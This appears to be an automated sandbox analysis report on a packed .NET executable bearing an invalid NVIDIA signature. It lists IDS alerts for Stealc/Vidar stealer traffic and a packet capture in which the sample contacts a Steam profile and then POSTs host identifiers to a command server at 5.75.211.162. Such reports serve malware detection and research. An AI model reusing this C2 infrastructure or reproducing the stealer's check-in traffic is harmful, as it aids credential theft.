                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Signature Valid:false
                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                              Signature Validation Error:The digital signature of the object did not verify
                                                              Error Number:-2146869232
                                                              Not Before, Not After
                                                              • 13/01/2023 00:00:00 16/01/2026 23:59:59
                                                              Subject Chain
                                                              • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                              Version:3
                                                              Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                              Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                              Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                              Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x63be80x53.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x5c8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x628000x2628
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x63ab00x1c.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x61c440x61e00e1b9391403e8b5dd041d05b44b7fd743False0.9938338122605364data7.995811814167676IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x640000x5c80x600db1daa9db276719b7dce2f7fee59adb7False0.4361979166666667data4.115782972549961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x660000xc0x200668ddc03321cdfb17f8be719cbc539e8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0x640a00x334data0.4426829268292683
                                                              RT_MANIFEST0x643d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                              DLLImport
                                                              mscoree.dll_CorExeMain
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-09-26T19:49:32.179378+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497405.75.211.162443TCP
                                                              2024-09-26T19:49:33.384870+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497415.75.211.162443TCP
                                                              2024-09-26T19:49:34.954154+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497425.75.211.162443TCP
                                                              2024-09-26T19:49:36.833518+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497435.75.211.162443TCP
                                                              2024-09-26T19:49:37.670343+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config15.75.211.162443192.168.2.449743TCP
                                                              2024-09-26T19:49:38.321713+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497445.75.211.162443TCP
                                                              2024-09-26T19:49:39.047099+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.4497445.75.211.162443TCP
                                                              2024-09-26T19:49:39.047255+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M115.75.211.162443192.168.2.449744TCP
                                                              2024-09-26T19:49:52.524007+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497525.75.211.162443TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 26, 2024 19:49:29.943981886 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:29.944034100 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:29.944206953 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:29.950375080 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:29.950392008 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:30.605416059 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:30.605540991 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:30.705694914 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:30.705729008 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:30.706187010 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:30.708195925 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:30.712035894 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:30.759404898 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.135174990 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.135207891 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.135252953 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.135319948 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.135358095 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.135376930 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.135405064 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.235779047 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.235802889 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.235883951 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.235896111 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.235939026 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.240860939 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.240941048 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.240947008 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.240964890 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.240989923 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.241022110 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.241302967 CEST49739443192.168.2.4104.102.49.254
                                                              Sep 26, 2024 19:49:31.241321087 CEST44349739104.102.49.254192.168.2.4
                                                              Sep 26, 2024 19:49:31.252790928 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:31.252932072 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:31.253011942 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:31.253381014 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:31.253418922 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.179227114 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.179378033 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.188134909 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.188153028 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.188352108 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.188401937 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.188694954 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.235459089 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.692516088 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.692646980 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.692682981 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.692769051 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.695744038 CEST49740443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.695796013 CEST443497405.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.698353052 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.698406935 CEST443497415.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:32.698493004 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.698765039 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:32.698781967 CEST443497415.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:33.384660006 CEST443497415.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:33.384870052 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:33.385421991 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:33.385435104 CEST443497415.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:33.387629986 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:33.387635946 CEST443497415.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:34.149777889 CEST443497415.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:34.149857044 CEST443497415.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:34.149914980 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.149950027 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.150275946 CEST49741443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.150294065 CEST443497415.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:34.152062893 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.152091026 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:34.152159929 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.152410984 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.152424097 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:34.954054117 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:34.954154015 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.954724073 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.954735041 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:34.956872940 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:34.956878901 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:35.655519962 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:35.655545950 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:35.655608892 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:35.655613899 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:35.655657053 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:35.655975103 CEST49742443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:35.655994892 CEST443497425.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:35.658073902 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:35.658128023 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:35.658211946 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:35.658435106 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:35.658447981 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:36.833436966 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:36.833518028 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:36.833981037 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:36.833995104 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:36.836066008 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:36.836071968 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:37.670162916 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:37.670188904 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:37.670236111 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:37.670253992 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:37.670265913 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:37.670314074 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:37.670773029 CEST49743443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:37.670800924 CEST443497435.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:37.673362970 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:37.673405886 CEST443497445.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:37.673511028 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:37.673779011 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:37.673794031 CEST443497445.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:38.321634054 CEST443497445.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:38.321712971 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:38.337447882 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:38.337462902 CEST443497445.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:38.347235918 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:38.347245932 CEST443497445.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:39.047061920 CEST443497445.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:39.047136068 CEST443497445.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:39.047142029 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:39.047205925 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:39.047450066 CEST49744443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:39.047494888 CEST443497445.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:51.777182102 CEST49752443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:51.777230024 CEST443497525.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:51.777306080 CEST49752443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:51.777857065 CEST49752443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:51.777873039 CEST443497525.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:52.523938894 CEST443497525.75.211.162192.168.2.4
                                                              Sep 26, 2024 19:49:52.524007082 CEST49752443192.168.2.45.75.211.162
                                                              Sep 26, 2024 19:49:52.640487909 CEST49752443192.168.2.45.75.211.162
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 26, 2024 19:49:29.931256056 CEST5528653192.168.2.41.1.1.1
                                                              Sep 26, 2024 19:49:29.939227104 CEST53552861.1.1.1192.168.2.4
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Sep 26, 2024 19:49:29.931256056 CEST192.168.2.41.1.1.10x4feeStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Sep 26, 2024 19:49:29.939227104 CEST1.1.1.1192.168.2.40x4feeNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                              • steamcommunity.com
                                                              • 5.75.211.162
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449739104.102.49.2544435676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-26 17:49:30 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                              Host: steamcommunity.com
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-09-26 17:49:31 UTC1870INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                              Cache-Control: no-cache
                                                              Date: Thu, 26 Sep 2024 17:49:31 GMT
                                                              Content-Length: 34725
                                                              Connection: close
                                                              Set-Cookie: sessionid=d1ab3d0c8b19a33f54ded9b6; Path=/; Secure; SameSite=None
                                                              Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                              2024-09-26 17:49:31 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                              2024-09-26 17:49:31 UTC16384INData Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e
                                                              Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
                                                              2024-09-26 17:49:31 UTC3768INData Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f
                                                              Data Ascii: vate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
                                                              2024-09-26 17:49:31 UTC59INData Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: </div>... responsive_page_frame --></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.4497405.75.211.1624435676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-26 17:49:32 UTC185OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                              Host: 5.75.211.162
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-09-26 17:49:32 UTC158INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Thu, 26 Sep 2024 17:49:32 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              2024-09-26 17:49:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.4497415.75.211.1624435676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-26 17:49:33 UTC277OUTPOST / HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                              Host: 5.75.211.162
                                                              Content-Length: 256
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-09-26 17:49:33 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 42 43 36 30 39 38 37 39 33 37 32 38 32 37 36 38 36 39 39 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 2d 2d 0d
